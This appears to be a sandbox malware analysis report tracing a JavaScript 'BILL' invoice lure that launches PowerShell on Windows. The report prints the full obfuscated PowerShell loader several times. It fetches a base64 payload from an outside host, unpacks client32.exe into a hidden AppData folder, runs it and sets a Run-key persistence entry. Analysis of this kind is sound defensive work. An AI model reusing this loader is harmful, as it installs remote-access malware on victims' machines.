Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1260 wrote to memory of 516 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 516 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 3356 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 3356 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://blawx.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc960f9758,0x7ffc960f9768,0x7ffc960f9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2700 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2816 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4780 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL63351.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $rSWtfPHxWB='https://boxtechcompany.com/1/GetData.php?14396';$nHOWpVklImSTUOhYYBi=(New-Object System.Net.WebClient).DownloadString($rSWtfPHxWB);$jcRdbxdvRpQileHzMRdoTehDjWhtoWrPXn=[System.Convert]::FromBase64String($nHOWpVklImSTUOhYYBi);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -PathType Container)) { New-Item -Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -ItemType Directory };$p=Join-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$jcRdbxdvRpQileHzMRdoTehDjWhtoWrPXn);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -Force; $FSDFSSD.attributes='Hidden';$s=$ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL33615.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $rajXRsKbLyahKmgEQDRAysTgndvrH='https://boxtechcompany.com/1/GetData.php?14032';$rjENXRCqoSqtoTmbRXtRUFSynJahYI=(New-Object System.Net.WebClient).DownloadString($rajXRsKbLyahKmgEQDRAysTgndvrH);$mzPXXDkRSgchHwrjafrXw=[System.Convert]::FromBase64String($rjENXRCqoSqtoTmbRXtRUFSynJahYI);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $DqYWXtvBt=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $DqYWXtvBt -PathType Container)) { New-Item -Path $DqYWXtvBt -ItemType Directory };$p=Join-Path $DqYWXtvBt 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$mzPXXDkRSgchHwrjafrXw);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$DqYWXtvBt)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $DqYWXtvBt 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $DqYWXtvBt -Force; $FSDFSSD.attributes='Hidden';$s=$DqYWXtvBt+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL33615.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ERnqGIyavgxZkhhFQQzcsMLi='https://boxtechcompany.com/1/GetData.php?5702';$uiEIBqhhSA=(New-Object System.Net.WebClient).DownloadString($ERnqGIyavgxZkhhFQQzcsMLi);$RBFufKpXmacFNkTysIcaZnCklUwhgv=[System.Convert]::FromBase64String($uiEIBqhhSA);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $qdQZulxrcLjODJPetdoUbikqRuSmW=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $qdQZulxrcLjODJPetdoUbikqRuSmW -PathType Container)) { New-Item -Path $qdQZulxrcLjODJPetdoUbikqRuSmW -ItemType Directory };$p=Join-Path $qdQZulxrcLjODJPetdoUbikqRuSmW 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$RBFufKpXmacFNkTysIcaZnCklUwhgv);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$qdQZulxrcLjODJPetdoUbikqRuSmW)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $qdQZulxrcLjODJPetdoUbikqRuSmW 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $qdQZulxrcLjODJPetdoUbikqRuSmW -Force; $FSDFSSD.attributes='Hidden';$s=$qdQZulxrcLjODJPetdoUbikqRuSmW+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5192 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5908 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL10601.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

